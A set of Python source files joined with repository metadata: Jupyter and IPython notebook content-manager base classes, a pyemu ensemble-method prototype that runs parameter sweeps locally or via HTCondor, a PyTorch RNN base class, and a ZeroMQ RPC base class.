        Override this method in subclasses.

        Parameters
        ----------
        path : string
            The API path of a file to check for.

        Returns
        -------
        exists : bool
            Whether the file exists.
        """
        raise NotImplementedError('must be implemented in a subclass')

    def exists(self, path):
        """Does a file or directory exist at the given path?

        Like os.path.exists

        Parameters
        ----------
        path : string
            The API path of a file or directory to check for.

        Returns
        -------
        exists : bool
            Whether the target exists.
        """
        return self.file_exists(path) or self.dir_exists(path)

    def get(self, path, content=True, type=None, format=None):
        """Get a file or directory model."""
        raise NotImplementedError('must be implemented in a subclass')

    def save(self, model, path):
        """
        Save a file or directory model to path.

        Should return the saved model with no content. Save implementations
        should call self.run_pre_save_hook(model=model, path=path) prior to
        writing any data.
        """
        raise NotImplementedError('must be implemented in a subclass')

    def delete_file(self, path):
        """Delete the file or directory at path."""
        raise NotImplementedError('must be implemented in a subclass')

    def rename_file(self, old_path, new_path):
        """Rename a file or directory."""
        raise NotImplementedError('must be implemented in a subclass')

    # ContentsManager API part 2: methods that have useable default
    # implementations, but can be overridden in subclasses.

    def delete(self, path):
        """Delete a file/directory and any associated checkpoints."""
        path = path.strip('/')
        if not path:
            raise HTTPError(400, "Can't delete root")
        self.delete_file(path)
        self.checkpoints.delete_all_checkpoints(path)

    def rename(self, old_path, new_path):
        """Rename a file and any checkpoints associated with that file."""
        self.rename_file(old_path, new_path)
        self.checkpoints.rename_all_checkpoints(old_path, new_path)

    def update(self, model, path):
        """Update the file's path

        For use in PATCH requests, to enable renaming a file without
        re-uploading its contents. Only used for renaming at the moment.
        """
        path = path.strip('/')
        new_path = model.get('path', path).strip('/')
        if path != new_path:
            self.rename(path, new_path)
        # return a content-free model for the (possibly renamed) target
        model = self.get(new_path, content=False)
        return model

    def info_string(self):
        # one-line description used by log_info(); subclasses may override
        return "Serving contents"

    def get_kernel_path(self, path, model=None):
        """Return the API path for the kernel

        KernelManagers can turn this value into a filesystem path,
        or ignore it altogether.

        The default value here will start kernels in the directory of the
        notebook server. FileContentsManager overrides this to use the
        directory containing the notebook.
        """
        return ''

    def increment_filename(self, filename, path='', insert=''):
        """Increment a filename until it is unique.

        Parameters
        ----------
        filename : unicode
            The name of a file, including extension
        path : unicode
            The API path of the target's directory
        insert: unicode
            The characters to insert after the base filename

        Returns
        -------
        name : unicode
            A filename that is unique, based on the input filename.
        """
        # Extract the full suffix from the filename (e.g. .tar.gz)
        path = path.strip('/')
        basename, dot, ext = filename.rpartition('.')
        if ext != 'ipynb':
            # for non-notebooks, split on the FIRST dot so the whole
            # multi-part extension (e.g. .tar.gz) is preserved
            basename, dot, ext = filename.partition('.')

        suffix = dot + ext

        for i in itertools.count():
            if i:
                insert_i = '{}{}'.format(insert, i)
            else:
                insert_i = ''
            name = u'{basename}{insert}{suffix}'.format(basename=basename,
                insert=insert_i, suffix=suffix)
            if not self.exists(u'{}/{}'.format(path, name)):
                break
        return name

    def validate_notebook_model(self, model):
        """Add failed-validation message to model"""
        try:
            validate_nb(model['content'])
        except ValidationError as e:
            model['message'] = u'Notebook validation failed: {}:\n{}'.format(
                e.message, json.dumps(e.instance, indent=1, default=lambda obj: '<UNKNOWN>'),
            )
        return model

    def new_untitled(self, path='', type='', ext=''):
        """Create a new untitled file or directory in path

        path must be a directory

        File extension can be specified.

        Use `new` to create files with a fully specified path (including filename).
        """
        path = path.strip('/')
        if not self.dir_exists(path):
            raise HTTPError(404, 'No such directory: %s' % path)

        model = {}
        if type:
            model['type'] = type

        if ext == '.ipynb':
            model.setdefault('type', 'notebook')
        else:
            model.setdefault('type', 'file')

        insert = ''
        if model['type'] == 'directory':
            untitled = self.untitled_directory
            insert = ' '
        elif model['type'] == 'notebook':
            untitled = self.untitled_notebook
            ext = '.ipynb'
        elif model['type'] == 'file':
            untitled = self.untitled_file
        else:
            raise HTTPError(400, "Unexpected model type: %r" % model['type'])

        name = self.increment_filename(untitled + ext, path, insert=insert)
        path = u'{0}/{1}'.format(path, name)
        return self.new(model, path)

    def new(self, model=None, path=''):
        """Create a new file or directory and return its model with no content.

        To create a new untitled entity in a directory, use `new_untitled`.
        """
        path = path.strip('/')
        if model is None:
            model = {}

        if path.endswith('.ipynb'):
            model.setdefault('type', 'notebook')
        else:
            model.setdefault('type', 'file')

        # no content, not a directory, so fill out new-file model
        if 'content' not in model and model['type'] != 'directory':
            if model['type'] == 'notebook':
                model['content'] = new_notebook()
                model['format'] = 'json'
            else:
                model['content'] = ''
                model['type'] = 'file'
                model['format'] = 'text'

        model = self.save(model, path)
        return model

    def copy(self, from_path, to_path=None):
        """Copy an existing file and return its new model.

        If to_path not specified, it will be the parent directory of from_path.
        If to_path is a directory, filename will increment `from_path-Copy#.ext`.
        Considering multi-part extensions, the Copy# part will be placed before the first dot for all the extensions except `ipynb`.
        For easier manual searching in case of notebooks, the Copy# part will be placed before the last dot.

        from_path must be a full path to a file.
        """
        path = from_path.strip('/')
        if to_path is not None:
            to_path = to_path.strip('/')

        if '/' in path:
            from_dir, from_name = path.rsplit('/', 1)
        else:
            from_dir = ''
            from_name = path

        model = self.get(path)
        # drop identity fields so save() fills them in for the copy
        model.pop('path', None)
        model.pop('name', None)
        if model['type'] == 'directory':
            raise HTTPError(400, "Can't copy directories")

        if to_path is None:
            to_path = from_dir
        if self.dir_exists(to_path):
            # strip any existing "-Copy#" marker before appending a fresh one
            name = copy_pat.sub(u'.', from_name)
            to_name = self.increment_filename(name, to_path, insert='-Copy')
            to_path = u'{0}/{1}'.format(to_path, to_name)

        model = self.save(model, to_path)
        return model

    def log_info(self):
        self.log.info(self.info_string())

    def trust_notebook(self, path):
        """Explicitly trust a notebook

        Parameters
        ----------
        path : string
            The path of a notebook
        """
        model = self.get(path)
        nb = model['content']
        self.log.warning("Trusting notebook %s", path)
        self.notary.mark_cells(nb, True)
        self.check_and_sign(nb, path)

    def check_and_sign(self, nb, path=''):
        """Check for trusted cells, and sign the notebook.

        Called as a part of saving notebooks.

        Parameters
        ----------
        nb : dict
            The notebook dict
        path : string
            The notebook's path (for logging)
        """
        if self.notary.check_cells(nb):
            self.notary.sign(nb)
        else:
            self.log.warning("Notebook %s is not trusted", path)

    def mark_trusted_cells(self, nb, path=''):
        """Mark cells as trusted if the notebook signature matches.

        Called as a part of loading notebooks.

        Parameters
        ----------
        nb : dict
            The notebook object (in current nbformat)
        path : string
            The notebook's path (for logging)
        """
        trusted = self.notary.check_signature(nb)
        if not trusted:
            self.log.warning("Notebook %s is not trusted", path)
        self.notary.mark_cells(nb, trusted)

    def should_list(self, name):
        """Should this file/directory name be displayed in a listing?"""
        return not any(fnmatch(name, glob) for glob in self.hide_globs)

    # Part 3: Checkpoints API

    def create_checkpoint(self, path):
        """Create a checkpoint."""
        return self.checkpoints.create_checkpoint(self, path)

    def restore_checkpoint(self, checkpoint_id, path):
        """
        Restore a checkpoint.
        """
        self.checkpoints.restore_checkpoint(self, checkpoint_id, path)

    def list_checkpoints(self, path):
        return self.checkpoints.list_checkpoints(path)

    def delete_checkpoint(self, checkpoint_id, path):
        return self.checkpoints.delete_checkpoint(checkpoint_id, path)
| {
"repo_name": "sserrot/champion_relationships",
"path": "venv/Lib/site-packages/notebook/services/contents/manager.py",
"copies": "1",
"size": "16942",
"license": "mit",
"hash": -1723043293957401300,
"line_mean": 30.8458646617,
"line_max": 132,
"alpha_frac": 0.5861763664,
"autogenerated": false,
"ratio": 4.436239853364755,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00609762818004883,
"num_lines": 532
} |
"""A base class for developing prototype ensemble methods
"""
from __future__ import print_function, division
import os
from datetime import datetime
import shutil
import threading
import time
import warnings
import numpy as np
import pandas as pd
import pyemu
from pyemu.en import ParameterEnsemble, ObservationEnsemble
from pyemu.mat import Cov, Matrix
from pyemu.pst import Pst
from ..logger import Logger
class EnsembleMethod(object):
    """Base class for ensemble-type methods.  Should not be instantiated directly

    Parameters
    ----------
    pst : pyemu.Pst or str
        a control file instance or filename
    parcov : pyemu.Cov or str
        a prior parameter covariance matrix or filename. If None,
        parcov is constructed from parameter bounds (diagonal)
    obscov : pyemu.Cov or str
        a measurement noise covariance matrix or filename. If None,
        obscov is constructed from observation weights.
    num_workers : int
        number of workers to use in (local machine) parallel evaluation of the parmaeter
        ensemble.  If 0, serial evaluation is used.  Ignored if submit_file is not None
    submit_file : str
        the name of a HTCondor submit file.  If not None, HTCondor is used to
        evaluate the parameter ensemble in parallel by issuing condor_submit
        as a system command
    port : int
        the TCP port number to communicate on for parallel run management
    worker_dir : str
        path to a directory with a complete set of model files and PEST
        interface files
    """

    def __init__(
        self,
        pst,
        parcov=None,
        obscov=None,
        num_workers=0,
        use_approx_prior=True,
        submit_file=None,
        verbose=False,
        port=4004,
        worker_dir="template",
    ):
        self.logger = Logger(verbose)
        if verbose is not False:
            self.logger.echo = True
        self.num_workers = int(num_workers)
        # validate the run-management inputs up front: a condor submit file
        # takes precedence over local workers
        if submit_file is not None:
            if not os.path.exists(submit_file):
                self.logger.lraise("submit_file {0} not found".format(submit_file))
        elif num_workers > 0:
            if not os.path.exists(worker_dir):
                self.logger.lraise("template dir {0} not found".format(worker_dir))

        self.worker_dir = worker_dir
        self.submit_file = submit_file
        self.port = int(port)
        # filename templates for per-iteration ensemble CSV dumps
        self.paren_prefix = ".parensemble.{0:04d}.csv"
        self.obsen_prefix = ".obsensemble.{0:04d}.csv"

        if isinstance(pst, str):
            pst = Pst(pst)
        assert isinstance(pst, Pst)
        self.pst = pst
        # honor pest++ option overrides for the sweep interchange files
        self.sweep_in_csv = pst.pestpp_options.get(
            "sweep_parameter_csv_file", "sweep_in.csv"
        )
        self.sweep_out_csv = pst.pestpp_options.get(
            "sweep_output_csv_file", "sweep_out.csv"
        )
        if parcov is not None:
            assert isinstance(parcov, Cov)
        else:
            parcov = Cov.from_parameter_data(self.pst)
        if obscov is not None:
            assert isinstance(obscov, Cov)
        else:
            obscov = Cov.from_observation_data(pst)

        self.parcov = parcov
        self.obscov = obscov
        self._initialized = False
        self.iter_num = 0
        self.total_runs = 0
        self.raw_sweep_out = None

    def initialize(self, *args, **kwargs):
        raise Exception(
            "EnsembleMethod.initialize() must be implemented by the derived types"
        )

    def _calc_delta(self, ensemble, scaling_matrix=None):
        """
        calc the scaled ensemble differences from the mean
        """
        mean = np.array(ensemble.mean(axis=0))
        delta = ensemble.as_pyemu_matrix()
        for i in range(ensemble.shape[0]):
            delta.x[i, :] -= mean
        if scaling_matrix is not None:
            delta = scaling_matrix * delta.T
        # normalize by sqrt(N-1) so delta * delta^T approximates the covariance
        delta *= 1.0 / np.sqrt(float(ensemble.shape[0] - 1.0))
        return delta

    def _calc_obs(self, parensemble):
        # Evaluate the parameter ensemble (locally or via condor) and load the
        # resulting observation ensemble from the sweep output CSV.
        # NOTE(review): self.logger.log appears to be called in matched pairs
        # to open/close a timed step -- confirm against pyemu.Logger.
        self.logger.log("removing existing sweep in/out files")
        try:
            os.remove(self.sweep_in_csv)
        except Exception as e:
            self.logger.warn("error removing existing sweep in file:{0}".format(str(e)))
        try:
            os.remove(self.sweep_out_csv)
        except Exception as e:
            self.logger.warn(
                "error removing existing sweep out file:{0}".format(str(e))
            )
        self.logger.log("removing existing sweep in/out files")

        if parensemble.isnull().values.any():
            parensemble.to_csv("_nan.csv")
            self.logger.lraise(
                "_calc_obs() error: NaNs in parensemble (written to '_nan.csv')"
            )

        if self.submit_file is None:
            self._calc_obs_local(parensemble)
        else:
            self._calc_obs_condor(parensemble)

        # make a copy of sweep out for restart purposes
        # sweep_out = str(self.iter_num)+"_raw_"+self.sweep_out_csv
        # if os.path.exists(sweep_out):
        #     os.remove(sweep_out)
        # shutil.copy2(self.sweep_out_csv,sweep_out)

        self.logger.log("reading sweep out csv {0}".format(self.sweep_out_csv))
        failed_runs, obs = self._load_obs_ensemble(self.sweep_out_csv)
        self.logger.log("reading sweep out csv {0}".format(self.sweep_out_csv))
        self.total_runs += obs.shape[0]
        self.logger.statement("total runs:{0}".format(self.total_runs))
        return failed_runs, obs

    def _load_obs_ensemble(self, filename):
        # Parse a pestpp-swp output CSV into (failed_run_indices, ObservationEnsemble).
        if not os.path.exists(filename):
            self.logger.lraise("obsensemble file {0} does not exists".format(filename))
        obs = pd.read_csv(filename)
        obs.columns = [item.lower() for item in obs.columns]
        self.raw_sweep_out = obs.copy()  # save this for later to support restart
        assert (
            "input_run_id" in obs.columns
        ), "'input_run_id' col missing...need newer version of sweep"
        obs.index = obs.input_run_id
        failed_runs = None
        if 1 in obs.failed_flag.values:
            failed_runs = obs.loc[obs.failed_flag == 1].index.values
            self.logger.warn(
                "{0} runs failed (indices: {1})".format(
                    len(failed_runs), ",".join([str(f) for f in failed_runs])
                )
            )
        # keep only the observation columns named in the noise covariance
        obs = ObservationEnsemble.from_dataframe(
            df=obs.loc[:, self.obscov.row_names], pst=self.pst
        )
        if obs.isnull().values.any():
            self.logger.lraise("_calc_obs() error: NaNs in obsensemble")
        return failed_runs, obs

    def _get_master_thread(self):
        # Start a pestpp-swp run manager ("master") in a background thread;
        # callers must join() the returned thread after the workers finish.
        master_stdout = "_master_stdout.dat"
        master_stderr = "_master_stderr.dat"

        def master():
            try:
                # os.system("sweep {0} /h :{1} 1>{2} 2>{3}". \
                #     format(self.pst.filename, self.port, master_stdout, master_stderr))
                pyemu.os_utils.run(
                    "pestpp-swp {0} /h :{1} 1>{2} 2>{3}".format(
                        self.pst.filename, self.port, master_stdout, master_stderr
                    )
                )
            except Exception as e:
                self.logger.lraise("error starting condor master: {0}".format(str(e)))
            # surface anything the master wrote to stderr
            with open(master_stderr, "r") as f:
                err_lines = f.readlines()
            if len(err_lines) > 0:
                self.logger.warn(
                    "master stderr lines: {0}".format(
                        ",".join([l.strip() for l in err_lines])
                    )
                )

        master_thread = threading.Thread(target=master)
        master_thread.start()
        time.sleep(2.0)  # give the master a moment to bind its port
        return master_thread

    def _calc_obs_condor(self, parensemble):
        # Evaluate the ensemble by submitting workers through HTCondor.
        self.logger.log(
            "evaluating ensemble of size {0} with htcondor".format(parensemble.shape[0])
        )

        parensemble.to_csv(self.sweep_in_csv)
        master_thread = self._get_master_thread()

        condor_temp_file = "_condor_submit_stdout.dat"
        condor_err_file = "_condor_submit_stderr.dat"
        self.logger.log(
            "calling condor_submit with submit file {0}".format(self.submit_file)
        )
        try:
            os.system(
                "condor_submit {0} 1>{1} 2>{2}".format(
                    self.submit_file, condor_temp_file, condor_err_file
                )
            )
        except Exception as e:
            self.logger.lraise("error in condor_submit: {0}".format(str(e)))
        self.logger.log(
            "calling condor_submit with submit file {0}".format(self.submit_file)
        )
        time.sleep(2.0)  # some time for condor to submit the job and echo to stdout
        condor_submit_string = "submitted to cluster"
        with open(condor_temp_file, "r") as f:
            lines = f.readlines()
        self.logger.statement(
            "condor_submit stdout: {0}".format(",".join([l.strip() for l in lines]))
        )
        with open(condor_err_file, "r") as f:
            err_lines = f.readlines()
        if len(err_lines) > 0:
            self.logger.warn(
                "stderr from condor_submit:{0}".format([l.strip() for l in err_lines])
            )
        # scrape the cluster id from condor_submit's stdout so we can clean up
        cluster_number = None
        for line in lines:
            if condor_submit_string in line.lower():
                cluster_number = int(float(line.split(condor_submit_string)[-1]))
        if cluster_number is None:
            self.logger.lraise("couldn't find cluster number...")
        self.logger.statement("condor cluster: {0}".format(cluster_number))
        master_thread.join()
        self.logger.statement("condor master thread exited")
        self.logger.log("calling condor_rm on cluster {0}".format(cluster_number))
        os.system("condor_rm cluster {0}".format(cluster_number))
        self.logger.log("calling condor_rm on cluster {0}".format(cluster_number))
        self.logger.log(
            "evaluating ensemble of size {0} with htcondor".format(parensemble.shape[0])
        )

    def _calc_obs_local(self, parensemble):
        """
        propagate the ensemble forward using sweep.
        """
        self.logger.log(
            "evaluating ensemble of size {0} locally with sweep".format(
                parensemble.shape[0]
            )
        )
        parensemble.to_csv(self.sweep_in_csv)
        if self.num_workers > 0:
            # parallel: background master + num_workers local worker processes
            master_thread = self._get_master_thread()
            pyemu.utils.start_workers(
                self.worker_dir,
                "pestpp-swp",
                self.pst.filename,
                self.num_workers,
                worker_root="..",
                port=self.port,
            )
            master_thread.join()
        else:
            # serial: run pestpp-swp directly in the current directory
            os.system("pestpp-swp {0}".format(self.pst.filename))

        self.logger.log(
            "evaluating ensemble of size {0} locally with sweep".format(
                parensemble.shape[0]
            )
        )

    def update(
        self, lambda_mults=[1.0], localizer=None, run_subset=None, use_approx=True
    ):
        raise Exception(
            "EnsembleMethod.update() must be implemented by the derived types"
        )
| {
"repo_name": "jtwhite79/pyemu",
"path": "pyemu/prototypes/ensemble_method.py",
"copies": "1",
"size": "11306",
"license": "bsd-3-clause",
"hash": -9055395939496956000,
"line_mean": 36.3135313531,
"line_max": 94,
"alpha_frac": 0.5669555988,
"autogenerated": false,
"ratio": 3.850817438692098,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4917773037492098,
"avg_score": null,
"num_lines": null
} |
""" A base class for RNN. """
import torch.nn as nn
class BaseRNN(nn.Module):
    r"""
    Applies a multi-layer RNN to an input sequence.

    Note:
        Do not use this class directly, use one of the sub classes.

    Args:
        vocab_size (int): size of the vocabulary
        max_len (int): maximum allowed length for the sequence to be processed
        hidden_size (int): number of features in the hidden state `h`
        input_dropout_p (float): dropout probability for the input sequence
        dropout_p (float): dropout probability for the output sequence
        n_layers (int): number of recurrent layers
        rnn_cell (str): type of RNN cell (Eg. 'LSTM' , 'GRU')

    Inputs: ``*args``, ``**kwargs``
        - ``*args``: variable length argument list.
        - ``**kwargs``: arbitrary keyword arguments.

    Attributes:
        SYM_MASK: masking symbol
        SYM_EOS: end-of-sequence symbol
    """

    SYM_MASK = "MASK"
    SYM_EOS = "EOS"

    def __init__(self, vocab_size, max_len, hidden_size, input_dropout_p, dropout_p, n_layers, rnn_cell):
        super(BaseRNN, self).__init__()
        # record the basic hyper-parameters on the instance
        self.vocab_size = vocab_size
        self.max_len = max_len
        self.hidden_size = hidden_size
        self.n_layers = n_layers
        self.input_dropout_p = input_dropout_p
        self.dropout_p = dropout_p
        # dropout module applied to the input sequence by subclasses
        self.input_dropout = nn.Dropout(p=input_dropout_p)
        # resolve the recurrent cell class from its case-insensitive name
        cell_name = rnn_cell.lower()
        if cell_name == 'gru':
            self.rnn_cell = nn.GRU
        elif cell_name == 'lstm':
            self.rnn_cell = nn.LSTM
        else:
            raise ValueError("Unsupported RNN Cell: {0}".format(rnn_cell))

    def forward(self, *args, **kwargs):
        # subclasses must implement the actual forward computation
        raise NotImplementedError()
| {
"repo_name": "taras-sereda/pytorch-seq2seq",
"path": "seq2seq/models/baseRNN.py",
"copies": "1",
"size": "1714",
"license": "apache-2.0",
"hash": -7821490979932513000,
"line_mean": 34.7083333333,
"line_max": 105,
"alpha_frac": 0.6015169195,
"autogenerated": false,
"ratio": 3.726086956521739,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9826621171619223,
"avg_score": 0.00019654088050314464,
"num_lines": 48
} |
"""A base class for RPC services and proxies.
Authors:
* Brian Granger
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2012. Brian Granger, Min Ragan-Kelley
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING.BSD, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import zmq
from zmq.eventloop.ioloop import IOLoop
from .serializer import PickleSerializer
#-----------------------------------------------------------------------------
# RPC base class
#-----------------------------------------------------------------------------
class RPCBase(object):

    def __init__(self, loop=None, context=None, serializer=None):
        """Base class for RPC service and proxy.

        Parameters
        ==========
        loop : IOLoop
            An existing IOLoop instance, if not passed, then IOLoop.instance()
            will be used.
        context : Context
            An existing Context instance, if not passed, the Context.instance()
            will be used.
        serializer : Serializer
            An instance of a Serializer subclass that will be used to serialize
            and deserialize args, kwargs and the result.
        """
        # fall back to the process-wide singletons when not given explicitly
        if loop is None:
            loop = IOLoop.instance()
        if context is None:
            context = zmq.Context.instance()
        if serializer is None:
            serializer = PickleSerializer()
        self.loop = loop
        self.context = context
        self._serializer = serializer
        self.socket = None
        self.stream = None
        self.reset()

    #-------------------------------------------------------------------------
    # Public API
    #-------------------------------------------------------------------------

    def reset(self):
        """Reset the socket/stream."""
        # close any previously created socket before building a fresh one
        old_socket = self.socket
        if isinstance(old_socket, zmq.Socket):
            old_socket.close()
        self._create_socket()
        self.urls = []

    def bind(self, url):
        """Bind the service to a url of the form proto://ip:port."""
        self.urls.append(url)
        self.socket.bind(url)

    def connect(self, url):
        """Connect the service to a url of the form proto://ip:port."""
        self.urls.append(url)
        self.socket.connect(url)
| {
"repo_name": "ellisonbg/zpyrpc",
"path": "zpyrpc/base.py",
"copies": "1",
"size": "2496",
"license": "bsd-3-clause",
"hash": 6229002890283465000,
"line_mean": 32.7297297297,
"line_max": 87,
"alpha_frac": 0.4655448718,
"autogenerated": false,
"ratio": 5.461706783369803,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.01543741136147012,
"num_lines": 74
} |
"""A base class notebook manager.
Authors:
* Brian Granger
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
import uuid
from tornado import web
from IPython.config.configurable import LoggingConfigurable
from IPython.nbformat import current
from IPython.utils.traitlets import List, Dict, Unicode, TraitError
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class NotebookManager(LoggingConfigurable):
    """Base class for notebook managers.

    Subclasses provide the actual storage backend by implementing the
    ``NotImplementedError`` methods below (read/write/delete/checkpoints).
    """

    # Todo:
    # The notebook_dir attribute is used to mean a couple of different things:
    # 1. Where the notebooks are stored if FileNotebookManager is used.
    # 2. The cwd of the kernel for a project.
    # Right now we use this attribute in a number of different places and
    # we are going to have to disentangle all of this.
    notebook_dir = Unicode(os.getcwdu(), config=True, help="""
        The directory to use for notebooks.
    """)

    def _notebook_dir_changed(self, name, old, new):
        """do a bit of validation of the notebook dir"""
        if not os.path.isabs(new):
            # If we receive a non-absolute path, make it absolute.
            abs_new = os.path.abspath(new)
            self.notebook_dir = abs_new
            return
        if os.path.exists(new) and not os.path.isdir(new):
            raise TraitError("notebook dir %r is not a directory" % new)
        if not os.path.exists(new):
            self.log.info("Creating notebook dir %s", new)
            try:
                os.mkdir(new)
            except OSError:
                # Was a bare ``except:``; only filesystem failures are
                # expected here, and a bare except would also swallow
                # KeyboardInterrupt/SystemExit.
                raise TraitError("Couldn't create notebook dir %r" % new)

    # Serialization formats accepted by get/save.
    allowed_formats = List([u'json', u'py'])

    # Map notebook_ids to notebook names
    mapping = Dict()

    def load_notebook_names(self):
        """Load the notebook names into memory.

        This should be called once immediately after the notebook manager
        is created to load the existing notebooks into the mapping in
        memory.
        """
        self.list_notebooks()

    def list_notebooks(self):
        """List all notebooks.

        This returns a list of dicts, each of the form::

            dict(notebook_id=notebook,name=name)

        This list of dicts should be sorted by name::

            data = sorted(data, key=lambda item: item['name'])
        """
        raise NotImplementedError('must be implemented in a subclass')

    def new_notebook_id(self, name):
        """Generate a new notebook_id for a name and store its mapping."""
        # TODO: the following will give stable urls for notebooks, but unless
        # the notebooks are immediately redirected to their new urls when their
        # filemname changes, nasty inconsistencies result. So for now it's
        # disabled and instead we use a random uuid4() call. But we leave the
        # logic here so that we can later reactivate it, whhen the necessary
        # url redirection code is written.
        #notebook_id = unicode(uuid.uuid5(uuid.NAMESPACE_URL,
        #                 'file://'+self.get_path_by_name(name).encode('utf-8')))
        notebook_id = unicode(uuid.uuid4())
        self.mapping[notebook_id] = name
        return notebook_id

    def delete_notebook_id(self, notebook_id):
        """Delete a notebook's id in the mapping.

        This doesn't delete the actual notebook, only its entry in the mapping.
        """
        del self.mapping[notebook_id]

    def notebook_exists(self, notebook_id):
        """Does a notebook exist?"""
        return notebook_id in self.mapping

    def get_notebook(self, notebook_id, format=u'json'):
        """Get the representation of a notebook in format by notebook_id."""
        format = unicode(format)
        if format not in self.allowed_formats:
            raise web.HTTPError(415, u'Invalid notebook format: %s' % format)
        last_modified, nb = self.read_notebook_object(notebook_id)
        kwargs = {}
        if format == 'json':
            # don't split lines for sending over the wire, because it
            # should match the Python in-memory format.
            kwargs['split_lines'] = False
        data = current.writes(nb, format, **kwargs)
        name = nb.metadata.get('name', 'notebook')
        return last_modified, name, data

    def read_notebook_object(self, notebook_id):
        """Get the object representation of a notebook by notebook_id."""
        raise NotImplementedError('must be implemented in a subclass')

    def save_new_notebook(self, data, name=None, format=u'json'):
        """Save a new notebook and return its notebook_id.

        If a name is passed in, it overrides any values in the notebook data
        and the value in the data is updated to use that value.
        """
        if format not in self.allowed_formats:
            raise web.HTTPError(415, u'Invalid notebook format: %s' % format)
        try:
            nb = current.reads(data.decode('utf-8'), format)
        except Exception:
            # Narrowed from a bare ``except:`` so that SystemExit and
            # KeyboardInterrupt are not converted into HTTP 400s.
            raise web.HTTPError(400, u'Invalid JSON data')
        if name is None:
            try:
                name = nb.metadata.name
            except AttributeError:
                raise web.HTTPError(400, u'Missing notebook name')
        nb.metadata.name = name
        notebook_id = self.write_notebook_object(nb)
        return notebook_id

    def save_notebook(self, notebook_id, data, name=None, format=u'json'):
        """Save an existing notebook by notebook_id."""
        if format not in self.allowed_formats:
            raise web.HTTPError(415, u'Invalid notebook format: %s' % format)
        try:
            nb = current.reads(data.decode('utf-8'), format)
        except Exception:
            # Narrowed from a bare ``except:`` (see save_new_notebook).
            raise web.HTTPError(400, u'Invalid JSON data')
        if name is not None:
            nb.metadata.name = name
        self.write_notebook_object(nb, notebook_id)

    def write_notebook_object(self, nb, notebook_id=None):
        """Write a notebook object and return its notebook_id.

        If notebook_id is None, this method should create a new notebook_id.
        If notebook_id is not None, this method should check to make sure it
        exists and is valid.
        """
        raise NotImplementedError('must be implemented in a subclass')

    def delete_notebook(self, notebook_id):
        """Delete notebook by notebook_id."""
        raise NotImplementedError('must be implemented in a subclass')

    def increment_filename(self, name):
        """Increment a filename to make it unique.

        This exists for notebook stores that must have unique names. When a notebook
        is created or copied this method constructs a unique filename, typically
        by appending an integer to the name.
        """
        return name

    def new_notebook(self):
        """Create a new notebook and return its notebook_id."""
        name = self.increment_filename('Untitled')
        metadata = current.new_metadata(name=name)
        nb = current.new_notebook(metadata=metadata)
        notebook_id = self.write_notebook_object(nb)
        return notebook_id

    def copy_notebook(self, notebook_id):
        """Copy an existing notebook and return its notebook_id."""
        last_mod, nb = self.read_notebook_object(notebook_id)
        name = nb.metadata.name + '-Copy'
        name = self.increment_filename(name)
        nb.metadata.name = name
        notebook_id = self.write_notebook_object(nb)
        return notebook_id

    # Checkpoint-related

    def create_checkpoint(self, notebook_id):
        """Create a checkpoint of the current state of a notebook

        Returns a checkpoint_id for the new checkpoint.
        """
        raise NotImplementedError("must be implemented in a subclass")

    def list_checkpoints(self, notebook_id):
        """Return a list of checkpoints for a given notebook"""
        return []

    def restore_checkpoint(self, notebook_id, checkpoint_id):
        """Restore a notebook from one of its checkpoints"""
        raise NotImplementedError("must be implemented in a subclass")

    def delete_checkpoint(self, notebook_id, checkpoint_id):
        """delete a checkpoint for a notebook"""
        raise NotImplementedError("must be implemented in a subclass")

    def log_info(self):
        self.log.info(self.info_string())

    def info_string(self):
        return "Serving notebooks"
| {
"repo_name": "marcoantoniooliveira/labweb",
"path": "oscar/lib/python2.7/site-packages/IPython/html/services/notebooks/nbmanager.py",
"copies": "2",
"size": "8907",
"license": "bsd-3-clause",
"hash": -8183609429854685000,
"line_mean": 36.9021276596,
"line_max": 84,
"alpha_frac": 0.6003143595,
"autogenerated": false,
"ratio": 4.5121580547112465,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6112472414211247,
"avg_score": null,
"num_lines": null
} |
"""A base class notebook manager.
Authors:
* Brian Granger
* Zach Sailer
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from fnmatch import fnmatch
import itertools
import os
from IPython.config.configurable import LoggingConfigurable
from IPython.nbformat import current, sign
from IPython.utils.traitlets import Instance, Unicode, List
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class NotebookManager(LoggingConfigurable):
    """Base class for notebook managers.

    Part 1 of the API (storage primitives) must be overridden by subclasses;
    part 2 provides default implementations built on top of part 1.
    """

    # Extension appended to every notebook file name.
    filename_ext = Unicode(u'.ipynb')

    notary = Instance(sign.NotebookNotary)
    def _notary_default(self):
        return sign.NotebookNotary(parent=self)

    hide_globs = List(Unicode, [u'__pycache__'], config=True, help="""
        Glob patterns to hide in file and directory listings.
    """)

    # NotebookManager API part 1: methods that must be
    # implemented in subclasses.

    def path_exists(self, path):
        """Does the API-style path (directory) actually exist?

        Override this method in subclasses.

        Parameters
        ----------
        path : string
            The path to check

        Returns
        -------
        exists : bool
            Whether the path does indeed exist.
        """
        raise NotImplementedError

    def is_hidden(self, path):
        """Does the API style path correspond to a hidden directory or file?

        Parameters
        ----------
        path : string
            The path to check. This is an API path (`/` separated,
            relative to base notebook-dir).

        Returns
        -------
        exists : bool
            Whether the path is hidden.
        """
        raise NotImplementedError

    def notebook_exists(self, name, path=''):
        """Returns a True if the notebook exists. Else, returns False.

        Parameters
        ----------
        name : string
            The name of the notebook you are checking.
        path : string
            The relative path to the notebook (with '/' as separator)

        Returns
        -------
